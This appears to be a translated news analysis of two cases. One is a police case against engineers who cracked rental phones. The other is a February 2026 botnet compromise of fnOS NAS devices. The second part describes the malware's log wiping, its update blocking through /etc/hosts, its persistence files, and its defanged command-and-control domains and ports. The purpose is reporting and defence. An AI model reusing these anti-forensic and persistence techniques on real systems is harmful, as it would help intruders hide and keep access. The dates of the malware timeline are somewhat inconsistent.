High Salaries Not Enough: 3 Big‑Tech Engineers Caught in fnOS Black‑Market Hacks

In a recent "Net Clean 2025" operation, Zhejiang police uncovered a complete "acquire‑crack‑resell" chain targeting rental smartphones, arresting 17 suspects, including three core technical staff from well‑known internet companies who each earned more than ¥10 million by illegally cracking regulatory devices while earning salaries over ¥500 000.

The criminal network was organized into clear roles: a procurement team sourced the devices, core engineers bypassed the rental‑phone management and location locks, and other members handled resale and profit distribution, with upstream actors developing the cracking tools.

Technical analysis shows the attacks went beyond simple flashing: perpetrators bypassed device activation and remote‑management binding, modified or replaced system components, disabled or spoofed backend communications, and blocked the regulator’s location and control commands, constituting illegal intrusion and functional sabotage of computer information systems.

All three engineers held graduate degrees and worked at major tech firms in Shanghai and Hangzhou. According to police, they were not the masterminds but were recruited as "technical partners" motivated by extra income rather than necessity.

The case reflects common traits of high‑skill individuals in cyber‑gray markets: expertise in vulnerability exploitation, reverse engineering, and protocol cracking; deep knowledge of enterprise system architectures; strong anti‑forensic awareness; and a misjudgment of legal risks.

Police emphasized that technical prowess cannot outweigh the rule of law, as the suspects were detained without any confession based on a solid evidence chain.

Digital‑rental services have become attractive targets because low‑cost devices are easy to acquire, resale channels are mature, and once the cracking process is modularized it can be scaled for high profit, surpassing traditional gray‑market returns.

Separately, in February 2026, the private‑cloud system fnOS was massively compromised by the Netdragon botnet. Attackers first established an HTTP backdoor on exposed devices (e.g., /api GET requests on port 57132) to execute remote commands, later shifting to port 57199 to evade detection.

After infiltration, the malware performed "environment cleaning" by deleting log files ( /var/log/*.log, /var/log/messages*, /var/log/audit/audit.log*) and systemd logs, and altered /etc/hosts to point official update domains (e.g., apiv2‑liveupdate.fnnas.com) to 0.0.0.0, cutting off firmware updates and patches. It also terminated recovery services ( sysrestore_service, backup_service) and removed upgrade components.

Persistence was achieved via a two‑layer design: a user‑space script ( system_startup.sh) appended commands to download and run second‑stage payloads ( /sbin/gots, /usr/bin/<botid>) and registered systemd services for auto‑start; a kernel‑mode component loaded a disguised module (e.g., async_memcpys.ko) and later masqueraded as /etc/systemd/system/dockers.service to survive reboots.

The malware used hard‑coded keys and nonces to decrypt a string table containing markers like "PWNED FROM NETDRAG" and C2 domains such as aura.kabot[.]icu. Communication employed a custom binary protocol with login, heartbeat, command execution, and DDoS frames, protected by layered XOR and ChaCha20 encryption. C2 addresses rotated across IP ranges (e.g., 45.95.*) and ports (3489, 5098, 6608, 7489).

Upon receiving DDoS commands, the bot renamed system binaries ( /usr/bin/cat), terminated monitoring services ( network_service, resmon_service), and obscured traffic, making detection difficult. Commands were delivered via Telegram bots and HTTP APIs, targeting entities in China, the US, Singapore, Australia, and other regions.

Defenders released detection rules, prompting rapid malware iteration: a new build on 31 January removed iptables/nftables rules labeled "C2IP", encrypted DDoS modules with ChaCha20, and introduced an 8‑byte dynamic key wrapper. On 1 February the C2 instructed bots to delete rsa_private_key.pem, risking loss of device encryption services.

Victims reported that infected NAS devices could not complete firmware upgrades or run official security tools, remaining in a semi‑controlled state and continuously participating in the botnet. The incident was classified as the province’s first large‑scale IoT infrastructure hijacking.

fnOS vendor responded on 12 February with a comprehensive security bulletin, acknowledging a fundamental security flaw, releasing patches, disabling the un‑upgraded device relay service, hardening default configurations, and adopting SDL processes with regular audits. The statement emphasized a "fix‑first, notify‑later" approach to mitigate risk.

From a governance perspective, the incident exposed systemic shortcomings: the vulnerability existed in earlier releases and was reported in forums but not treated as high‑risk; users received insufficient early warnings; and transparency around infection scale and data exfiltration remains lacking. Sustainable security requires clear vulnerability grading, mandatory code audits, minimal exposure defaults, and offline emergency patch capabilities to prevent future large‑scale IoT hijackings.